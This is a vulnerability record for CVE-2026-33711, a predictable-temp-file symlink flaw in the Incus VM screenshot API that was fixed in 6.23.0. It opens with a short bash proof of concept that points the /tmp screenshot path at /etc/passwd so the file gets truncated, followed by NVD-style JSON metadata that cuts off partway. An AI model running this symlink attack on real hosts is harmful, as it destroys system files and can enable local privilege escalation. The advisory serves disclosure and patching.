CVE-2026-33711

#!/bin/bash # PoC for CVE-2026-33711: Incus Screenshot Symlink Attack # Prerequisites: Local access, fs.protected_symlinks disabled in kernel TARGET_FILE="/etc/passwd" # High privilege target file PREDICTABLE_TMP="/tmp/incus_screenshot_vm_1.tmp" # Predictable path used by Incus echo "[+] Creating symlink from $PREDICTABLE_TMP to $TARGET_FILE" ln -sf $TARGET_FILE $PREDICTABLE_TMP echo "[+] Waiting for admin/user to trigger screenshot API..." # In a real scenario, the attacker would loop or monitor to recreate the link if it fails # or trigger the API themselves if they have the permission. # When the Incus screenshot API is called: # Incus/QEMU writes to /tmp/incus_screenshot_vm_1.tmp # Due to symlink, data is written to /etc/passwd, truncating it. echo "[+] If successful, $TARGET_FILE has been truncated or modified." echo "[+] This can lead to DoS or Privilege Escalation."

{"cve": {"id": "CVE-2026-33711", "sourceIdentifier": "[email protected]", "published": "2026-03-26T23:16:20.423", "lastModified": "2026-03-30T18:51:41.500", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incus is a system container and virtual machine manager. Incus provides an API to retrieve VM screenshots. That API relies on the use of a temporary file for QEMU to write the screenshot to which is then picked up and sent to the user prior to deletion. As versions prior to 6.23.0 use predictable paths under /tmp for this, an attacker with local access to the system can abuse this mechanism by creating their own symlinks ahead of time. On the vast majority of Linux systems, this will result in a \"Permission denied\" error when requesting a screenshot. That's because the Linux kernel has a security feature designed to block such attacks, `protected_symlinks`. On the rare systems with this purposefully disabled, it's then possible to trick Incus intro truncating and altering the mode and permissions of arbitrary files on the filesystem, leading to a potential denial of service or possible local privilege escalation. Version 6.23.0 fixes the issue."}, {"lang": "es", "value": "Incus es un gestor de contenedores de sistema y máquinas virtuales. Incus proporciona una API para recuperar capturas de pantalla de la máquina virtual. Esa API se basa en el uso de un archivo temporal para que QEMU escriba la captura de pantalla, la cual luego se recoge y se envía al usuario antes de su eliminación. Dado que las versiones anteriores a la 6.23.0 utilizan rutas predecibles bajo /tmp para esto, un atacante con acceso local al sistema puede abusar de este mecanismo creando sus propios enlaces simbólicos con antelación. En la gran mayoría de los sistemas Linux, esto resultará en un error de 'Permiso denegado' al solicitar una captura de pantalla. Esto se debe a que el kernel de Linux tiene una característica de seguridad diseñada para bloquear tales ataques, protected_symlinks. En los sistemas raros con esto deshabilitado a propósito, es entonces posible engañar a Incus para que trunque y altere el modo y los permisos de archivos arbitrarios en el sistema de archivos, lo que lleva a una potencial denegación de servicio o posible escalada de privilegios local. La versión 6.23.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linuxcontainers:incus:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.23.0", "matchCriteriaId": "CBE3ABCB-1D47-4A45-A09A-C9F609C53131"}]}]}], "references": [{"url": "https://github.com/lxc/incus/security/advisories/GHSA-q9vp-3wcg-8p4x", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"ur ... (truncated)